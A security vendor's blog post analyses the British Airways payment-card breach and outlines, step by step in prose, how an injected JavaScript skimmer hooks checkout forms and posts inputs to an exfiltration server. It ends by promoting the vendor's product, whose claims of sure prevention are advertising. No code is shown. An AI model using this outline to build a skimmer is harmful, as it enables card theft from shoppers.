British Airways Falls Prey to Latest Attack Technique: Friendly Site Malicious JavaScript Attack


Trevor Reschke Head of Threat Intelligence

Last Thursday, another major breach hit the news, as British Airways announced that its website and mobile application had been compromised by criminals, which resulted in the theft of 380,000 customer transactions details.

The airline discovered that bookings made between August 21 and September 5 had been infiltrated in a “very sophisticated, malicious criminal attack”, with cyber-criminals obtaining names, street names, email addresses, credit card numbers, expiry dates and even security codes. BA reports that only customers who booked travel and made purchases on the BA site or mobile application within that time window were affected by the breach. Thankfully, stored credit card details are not at risk.

The following Tuesday, cyber security company RiskIQ announced that it had uncovered the malicious JavaScript code injected onto the British Airways website. The skimming script consisted of just 22 lines of obfuscated JavaScript, customized specifically for BA’s website. The malware grabbed data from the payment forms and sent it to the criminal’s servers once the customer had submitted it to the BA website.

This type of JavaScript-based malware attack has recently been on the rise. For example, earlier this year there were a string of attacks on sites running unpatched, open-source versions of the Magento shopping cart. After compromise, attackers embedded credential and payment theft malware within the legitimate Magento JavaScript files.


Why is this Type of Attack Getting More Popular?

This technique makes collection of stolen data simpler as the theft occurs on the user’s side and pushed to the criminal’s command and control center as it is collected. This also makes detection harder as the site is trusted and usually content delivered from mainstream websites are trusted – especially ones responsible for air travel.  Traditionally, criminals target the databases or the post-website internal network traffic to collect user financial data, those methods are usually highly defended. Further, compromising a database will give an attacker access to some data of value, but often it’s not of financial value: credit card numbers are usually encrypted, and Track data and CVV codes are rarely stored at all. Intercepting payment details at the time of use, as seen with this technique, the criminals have full access to this highly valuable data.  One major drawback to this attack technique, if the user had previously stored their financial details with the site, they would not be prompted to re-enter them and subsequently they would not have been stolen by the JavaScript based malware.

Previously, this data would only have been accessible through endpoint malware infection. However, it’s more advantageous for criminals to compromise servers that can distribute this type of malicious code for them, rather than infect individual endpoints. While servers generally require greater effort to hack than your typical home user’s computer, such intrusions pay far larger dividends because, once compromised, a centralized server can distribute malware to every user of a site.

Furthermore, the barrier to entry for orchestrating a JavaScript-based malware attack isn’t as high as one might think. The attackers don’t have to compromise the British Airways website itself – which would be far more difficult – they only need to compromise one of the many third-party applications British Airways uses on its website.

Modern websites make use of scores – often hundreds – of third-party libraries, and each vulnerability is essentially a hole that can be exploited to expose the website in its entirety. Once the attackers have infiltrated systems controlling third-party libraries they can insert site-specific malware into files containing the functionality BA’s site uses. It’s not so much a trojan horse as a subversion of legitimate functionality. Once the malicious code is merged into the legitimate code it will be served to every visitor of the infected site.


How Exactly Does the Malware Work?

  1. The current page’s URL is scanned to see if it matches a list of known, interesting patterns, e.g. “order”, or “checkout.”
  2. Every button, input, form, and submit element in the DOM is enumerated.
  3. For each of these elements it registers a new event handler. Depending on the element type, different event hooks are registered (e.g. the submit event handler is registered for form elements). However, the event handler function is the same regardless of the event.
  4. Every 30 seconds this event registration is executed again.
  5. The event handler, when triggered, creates a URL parameter string from all inputs on the page. This string is then sent as parameters of a POST request to an exfiltration site.


How Can You Protect Against These Types of Attack?

To date the security community and businesses have not had the tools to address these types of attacks automatically. Defense has relied on detection of changes in the third-party libraries, and active review of those changes. Even so, this has little effect if the code is new (such as with Zero-day attacks), or in this case where the code was carefully customized to the BA website to avoid detection. In addition, this is a time-consuming and human error-prone approach, particularly with minified JavaScript.

Ultimately, this approach on its own is flawed but businesses have another way to protect their payment pages. Rather than relying completely on the detection of malicious code, businesses can turn the issue on its head by stopping payment information leaving the site. This means, no matter what the method of attack is, the culprits are thwarted and customer data protected – which is the ideal outcome. In today’s digital era, it is not possible to stop all online customers from being attacked, but if the transaction session can be protected, the fraudulent activity can be prevented.

Trusted Knight’s Protector Air does precisely that – it’s a cloud-based solution that is invisible to the end users and stops transactional fraud by securing the transaction stack and therefore ensuring the integrity of every transaction.

Trusted Knight’s patented Protector Air technology would have prevented the BA data loss. Other solutions should detect changes to the payment page, and should have sent alerts indicating these changes, but those alerts would then have to be reviewed and acted upon by already overworked security teams, and still would have been addressed after-the-fact that a breach had taken place. Had Protector Air been in place, this breach would have been automatically prevented, no customer details would have gotten into the hands of criminals, and BA would have saved tens of millions of dollars in hard costs as well as untold losses in brand reputation.
Click the links below to find out more.
Request a Free Trial